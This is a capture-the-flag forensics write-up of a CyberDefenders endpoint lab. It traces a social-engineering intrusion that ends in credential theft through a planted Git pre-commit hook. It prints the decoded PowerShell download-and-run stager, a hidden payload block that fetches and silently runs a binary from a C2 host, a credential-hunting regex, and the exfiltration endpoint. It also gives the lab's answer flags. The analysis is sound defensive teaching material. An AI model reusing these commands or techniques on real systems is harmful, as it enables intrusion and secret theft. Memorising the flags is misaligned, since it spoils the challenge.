// CyberDefenders · Endpoint Forensics

CodeFreeze

CyberDefenders Medium Event Viewer, CyberChef, Registry Explorer, Timeline Explorer, PECmd, DB Browser for SQLlite

Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion

proof of completion → challenge page → ← all labs

Scenario

Caspery, a senior developer at Wowza Enterprise, reported that his git commit commands were taking unusually long to complete. Days later, the Threat Intelligence team found Caspery’s credentials and API keys actively traded on a dark web forum. A forensic image of his workstation was acquired for analysis.

Methodology

Browser history from the Zen Browser profile (places.sqlite) was opened in DB Browser for SQLite. The moz_places table surfaced a Google Meet session (meet.google.com/vqe-xhmi-jtn) followed immediately by a local HTML file being opened from disk:

file:///C:/Users/caspery/wowza/DevCompliance_20260121_200407.html

The HTML file was a convincingly styled “Compliance Report” — an audit score lure generated to make the attack feel legitimate. The filename timestamp (20260121_200407) pinpoints delivery to 2026-01-21 at 20:04. The attacker posed as an auditor during the Google Meet session and instructed Caspery to paste a PowerShell command into his terminal.

Execution — Encoded PowerShell Stager

PSReadLine history (ConsoleHost_history.txt) revealed the stager command mid-session between normal development activity:

powershell.exe -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3...

Decoding the Base64+UTF-16LE blob in CyberChef resolves to:

IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/ChickenLoner/486137f8a96668b4e9778ce43458fd2e/raw/4402acda06f89254c4fee1e8bb8a5cef6401745f/Dev-Workstation-Assessment.ps1')

The script (Dev-Workstation-Assessment.ps1) is a fully functional developer compliance checker with a hidden payload module appended at the bottom. The legitimate-looking output — toolchain checks, security hygiene scoring, HTML report generation — provides cover while the malicious section executes silently inside a Start-Job block:

Start-Job -ScriptBlock {
    $url = "http://speecltest.xyz/cf.exe"
    $target = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "6.exe")
    $wc = New-Object System.Net.WebClient
    $wc.DownloadFile($url, $target)
    $f = Get-Item $target -Force; $f.Attributes = "Hidden"
    Start-Process $target -WindowStyle Hidden
} | Out-Null

The binary downloads to C:\Users\caspery\AppData\Local\Temp\6.exe, is immediately hidden, and executed without a window. Reviewing the Gist revision history reveals the attacker originally tested against security-compliance.internal.corp before switching to the live C2 domain speecltest.xyz.

MFT analysis confirmed 6.exe was written to disk at 2026-01-21 13:04:32, matching the PSReadLine timestamp.

Enumeration — Backup Operators Discovery via Injected notepad.exe

With the C2 agent running, the attacker enumerated local security group membership. Windows logs this activity as Security Event ID 4799 (“A security-enabled local group membership was enumerated”), which records the calling process. Filtering Security.evtx for 4799 events after 6.exe executed at 13:04:32 surfaced a cluster at 2026-01-21 13:10:32 that stood apart from the routine SYSTEM-context enumerations:

TargetUserName:    Backup Operators / Users
SubjectUserSid:    S-1-5-21-3347199008-454752828-3392572726-1001 (caspery)
CallerProcessId:   0x201c (8220)
CallerProcessName: C:\Windows\System32\notepad.exe

Every other 4799 event was a benign svchost.exe query running under SYSTEM (S-1-5-18). This one was different — it ran in Caspery’s user context and the caller was notepad.exe, which has no legitimate reason to enumerate group membership. 6.exe had injected into notepad.exe, a quiet always-available process in the user session, and used it to probe the host’s group structure. The enumeration revealed that Caspery’s account belonged to the Backup Operators group, which grants SeBackupPrivilege and SeRestorePrivilege — the ability to read and write any file or registry key on the system regardless of ACLs, without requiring full Administrator rights. That privilege is what made the subsequent service hijack possible.

Privilege Escalation — DLL Hijacking via wisvc

With Backup Operators privileges in hand, the attacker could write to restricted registry paths. MFT analysis filtered for .dll files created after 13:04:32 on 2026-01-21 surfaced a suspicious entry:

C:\ProgramData\AnyDesk\gcapl.dll    Created: 2026-01-21 13:14:50

AnyDesk had been installed on the workstation (confirmed via Edge download history). The legitimate gcapi.dll sits in C:\Program Files (x86)\AnyDesk\ — the attacker named their malicious DLL gcapl.dll (extra l) and dropped it into C:\ProgramData\AnyDesk\ to intercept DLL search order resolution.

Twelve seconds after the DLL was dropped, Registry Explorer revealed the wisvc (Windows Insider Service) service was modified:

HKLM\SYSTEM\ControlSet001\Services\wisvc\Parameters
ServiceDll = C:\ProgramData\AnyDesk\gcapl.dll
LastWrite:  2026-01-21 13:15:02

The wisvc service runs inside the svchost.exe -k netsvcs group under SYSTEM. Modifying its ServiceDll via SeRestorePrivilege required no UAC prompt — a silent privilege escalation path. The attacker then waited for a system reboot.

Post-Reboot — DLL Loads and Persistence Installed

The System event log confirmed the OS restarted at 2026-01-22 11:36 (Kernel power events). Within 90 seconds of boot, MFT showed a log file written by the DLL:

C:\Windows\Temp\wisvc_debug.log    Created: 2026-01-22 11:38:11

The log filename blends into legitimate Windows diagnostics. With SYSTEM privileges now established, the attacker installed a fake monitoring service at 11:46:23:

ServiceName:  System Monitor
ImagePath:    C:\Windows\Sysmon.exe
AccountName:  LocalSystem

This is a direct Sysmon impersonation — identical display name, plausible binary path. To complete the disguise, a fake Sysmon operational event log was dropped at 2026-01-22 11:47:39:

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx

Opening the file reveals an ElfFile header followed entirely by null bytes — a stub to simulate logging history.

Exfiltration — Git Pre-Commit Hook

At 2026-01-22 12:50:22, the attacker dropped a pre-commit hook into a global hooks directory:

C:\ProgramData\.git-hooks\pre-commit    Created: 2026-01-22 12:50:22

At 13:07, the Git system-wide configuration file was modified to redirect all hook execution to this directory:

C:\Users\caspery\AppData\Local\Programs\Git\etc\gitconfig
core.hooksPath = C:\ProgramData\.git-hooks

This applied globally — every git commit on the machine would now trigger the planted hook. The pre-commit file was subsequently deleted, but bstrings against the pagefile recovered the GitHub URL hosting the exfiltration payload:

https://gist.githubusercontent.com/ChickenLoner/d59b614c1e9ed09edf98500e36ab4361/raw/

The script (secret.sh) runs a full credential scan on first execution then staged-only scans on subsequent commits, hunting for:

password|api[_-]?key|secret|token|aws[_-]?access|private[_-]?key|BEGIN.*PRIVATE.*KEY|DB_PASSWORD|POSTGRES|MYSQL_PASSWORD

A marker file (.git-scanner-init) is written to %USERPROFILE% after the initial full scan to prevent duplicate exfiltration of the complete repository. All collected data is POSTed to:

http://speecltest.xyz/upload

MFT confirmed .git-scanner-init was created at 2026-01-22 13:10:53, timestamping the first execution. Cross-referencing the webpage git log revealed three commits triggered the hook after core.hooksPath was set — “delete logs” (13:10:39), “add gitignore” (13:16:28), and “Task scheduler friendly” (13:33:19). The first triggering commit hash:

Caspery’s admin_data.json from the Wowza Enterprise web application (C:\Users\caspery\wowza\wowweb\webpage\admin_data.json) was identified in the Recycle Bin metadata as a deleted file — the credentials and API keys captured from this file are what surfaced on the dark web forum.

Attack Summary

Phase	Action
Initial Access	Google Meet social engineering — attacker posed as auditor, delivered encoded PowerShell stager
Execution	`Dev-Workstation-Assessment.ps1` downloaded from ChickenLoner’s GitHub Gist, hidden payload ran silently via `Start-Job`
C2 Deployment	`cf.exe` downloaded from `hxxp[://]speecltest[.]xyz/cf.exe`, written to Temp as `6.exe`, hidden and executed
Enumeration	Security group membership revealed Backup Operators privilege on Caspery’s account
DLL Staging	`gcapl.dll` dropped to `C:\ProgramData\AnyDesk\` masquerading as legitimate `gcapi.dll`
Privilege Escalation	`wisvc` ServiceDll modified to load `gcapl.dll` via `SeRestorePrivilege`; SYSTEM on next reboot
Persistence	Fake “System Monitor” service installed; fake Sysmon evtx dropped to simulate legitimate logging
Defense Evasion	`C:\Windows\Sysmon.exe` + null-padded `Sysmon%4Operational.evtx` deployed to blend into monitoring infrastructure
Collection	Git `core.hooksPath` redirected to `C:\ProgramData\.git-hooks\`; `secret.sh` pre-commit hook scans for credentials on every commit
Exfiltration	Credentials and API keys from `admin_data.json` POSTed to `hxxp[://]speecltest[.]xyz/upload`

IOCs

Type	Value
Meeting ID	vqe-xhmi-jtn (Google Meet)
URL (Stager)	hxxps[://]gist[.]githubusercontent[.]com/ChickenLoner/486137f8a96668b4e9778ce43458fd2e/raw/
URL (C2 Binary)	hxxp[://]speecltest[.]xyz/cf.exe
URL (Exfil Script)	hxxps[://]gist[.]githubusercontent[.]com/ChickenLoner/d59b614c1e9ed09edf98500e36ab4361/raw/
URL (Exfil Endpoint)	hxxp[://]speecltest[.]xyz/upload
Domain (Test C2)	security-compliance[.]internal[.]corp
File	C:\Users\caspery\AppData\Local\Temp\6.exe
File	C:\ProgramData\AnyDesk\gcapl.dll
File	C:\Windows\Temp\wisvc_debug.log
File	C:\Windows\Sysmon.exe
File	C:\ProgramData.git-hooks\pre-commit
File	C:\Users\caspery\AppData\Local\Programs\Git\etc\gitconfig
GitHub User	ChickenLoner
Script	Dev-Workstation-Assessment.ps1
Script	secret.sh
Marker File	.git-scanner-init
Commit Hash (first exfil)	70c08d68cbec8c04ff967616f306e22a21e9aba0

MITRE ATT&CK

Technique	ID	Description
Phishing: Spearphishing via Service	T1566.003	Attacker used Google Meet to deliver malicious PowerShell command under auditor pretense
User Execution: Malicious File	T1204.002	Caspery executed the encoded PowerShell stager believing it was a legitimate audit tool
PowerShell	T1059.001	Encoded `-EncodedCommand` stager used to download and execute compliance script
Ingress Tool Transfer	T1105	`cf.exe` downloaded from `speecltest.xyz` to `%TEMP%\6.exe`
Process Injection	T1055	C2 agent injected into running process post-execution
Hijack Execution Flow: DLL Side-Loading	T1574.002	`gcapl.dll` placed in AnyDesk directory to be loaded by `wisvc` service
Create or Modify System Process: Windows Service	T1543.003	`wisvc` ServiceDll hijacked; fake “System Monitor” service created
Masquerading: Match Legitimate Name or Location	T1036.004	`Sysmon.exe` and `System Monitor` service name used to impersonate Sysinternals Sysmon
Event Triggered Execution	T1546	Git `core.hooksPath` redirected globally; `pre-commit` hook fires on every commit
Unsecured Credentials: Credentials In Files	T1552.001	`secret.sh` scanned git history and staged files for API keys and passwords
Exfiltration Over Web Service	T1048.003	Credentials POSTed to `speecltest.xyz/upload` via curl in shell script
Indicator Removal: File Deletion	T1070.004	`pre-commit` hook, `wisvc_debug.log`, and other artifacts deleted post-execution

Defender Takeaways

Git global hook path monitoring — The attacker’s entire exfiltration mechanism depended on modifying core.hooksPath in the system-wide gitconfig. Monitoring writes to %ProgramFiles%\Git\etc\gitconfig and any user .gitconfig for hooksPath entries is a high-fidelity detection. SACL auditing on these files costs almost nothing and would have caught this immediately.

Backup Operators is a privileged group — It is frequently overlooked compared to Domain Admins but grants SeBackupPrivilege and SeRestorePrivilege, which allow writing to any registry key and file on the system regardless of ACLs. Developer workstations have no business reason to have users in this group. Regular audits of local group membership, particularly Backup Operators and Remote Desktop Users, should be standard practice.

DLL search order abuse via ProgramData — Writing to C:\ProgramData\<AppName>\ is achievable by any user without elevation on a default Windows install. Applications that load DLLs from ProgramData directories are vulnerable to this technique. Software vendors should use absolute paths for DLL loading, and defenders should monitor for .dll writes to ProgramData subdirectories.

Social engineering targeting developers — The fake compliance audit was convincing precisely because it ran real checks and produced real output. Developer culture of “run this command to check your environment” is a well-understood attack surface. Security awareness training for developers should specifically address unsolicited audit scripts, even from apparent colleagues or authority figures on video calls.

Credential hygiene in git repositories — The exfil script found real secrets in the repository because they were committed in plaintext. Pre-commit hooks designed to prevent secret commits (e.g. detect-secrets, git-secrets) are the correct technical control here — the attacker weaponised the hook mechanism precisely because it runs before the commit is finalised. Combining secret scanning with short-lived API keys and automated rotation limits the blast radius when exfiltration does occur.

The user suspected that the suspicious activity occurred after executing an "audit" script provided by an individual claiming to be an auditor during a meeting. Identify the meeting ID associated with the threat actor.

Click flag to reveal vqe-xhmi-jtn

During the meeting, the threat actor provided the victim with a malicious command disguised as an "audit" script intended to assess the developer environment. From the full URL hosting the actual script identify the GitHub username hosting the script and the script's filename

Click to reveal answer ChickenLoner, Dev-Workstation-Assessment.ps1

Upon inspection of the fake assessment script, an additional C2 URL was identified hosting a malicious binary that was ultimately executed on the system. What is the full URL of this C2 endpoint?

Click flag to reveal http://speecltest.xyz/cf.exe

A previous version of the script reveals another C2 address that was used to test the payload. What domain was identified in that earlier version?

Click to reveal answer security-compliance.internal.corp

Upon execution, the script downloads a binary file and runs it on the system. Identify the full path of the downloaded binary.

Click flag to reveal C:\Users\caspery\AppData\Local\Temp\6.exe

During the enumeration phase, the threat actor enumerated security groups on the system, revealing a process that had been injected by a malicious executable. What is the name of this process and its process ID?

Click to reveal answer notepad.exe, 8220

Security group enumeration revealed that the compromised user belonged to a special privileged group that allows members to back up and restore all files on the system. What is the name of this security group?

Click flag to reveal Backup Operators

To prepare for privilege escalation, the threat actor uploaded a DLL file masquerading as a legitimate DLL used by a remote desktop application installed on the system. What is the name of this file, and when was it created?

Click to reveal answer gcapl.dll, 2026-01-21 13:14

The threat actor abused a special privilege to modify an existing service on the system to load the previously identified DLL. What is the name of this service?

Click flag to reveal wisvc

The threat actor waited for a subsequent system reboot so the modified service could start and load the DLL. Determine the operating system startup time on the following day. What is the timestamp of this OS startup?

Click to reveal answer 2026-01-22 11:36

The DLL also implements logging functionality. Provide the full path of the log file created after the DLL was loaded into the process.

Click flag to reveal C:\Windows\Temp\wisvc_debug.log

After gaining high privileges, the threat actor created a service masquerading as a legitimate system monitoring tool that logs events such as process creation. What is the name of the service?

Click to reveal answer System Monitor

To make the service appear legitimate, the threat actor dropped a fake log file on the system. Provide the timestamp when this log file was created.

Click flag to reveal 2026-01-22 11:47

After identifying that the user was working on multiple projects and using Git for version control, the threat actor created a folder and dropped a file that executes before the user commits changes. What is the full path of this file?

Click to reveal answer ANSWER

The contents of the previously identified file reveal another script used for data exfiltration. From the full URL hosting this script identify the GitHub username hosting the script and the script's filename

Click flag to reveal ChickenLoner, secret.sh

The script uses a specific pattern to identify sensitive data within Git history and the current commit. What is the full pattern?

The script creates a marker file to determine whether it has previously executed on the system. What is the name of this file?

Click flag to reveal .git-scanner-init

What is the full URL where the exfiltrated data is uploaded?

Click to reveal answer http://speecltest.xyz/upload

How many times was the script executed on the system, and when was it first downloaded?

Click flag to reveal 3, 2026-01-22 13:10

What is the commit hash of the first commit that caused the script to execute?

Click to reveal answer 70c08d68cbec8c04ff967616f306e22a21e9aba0

To enable execution of the planted script, the threat actor modified Git's behavior. When did this modification occur?

Click flag to reveal 2026-01-22 13:07

🔒

// active lab

writeup locked

withheld in accordance with platform guidelines
to avoid spoiling live challenges.
password provided to recruiters on request.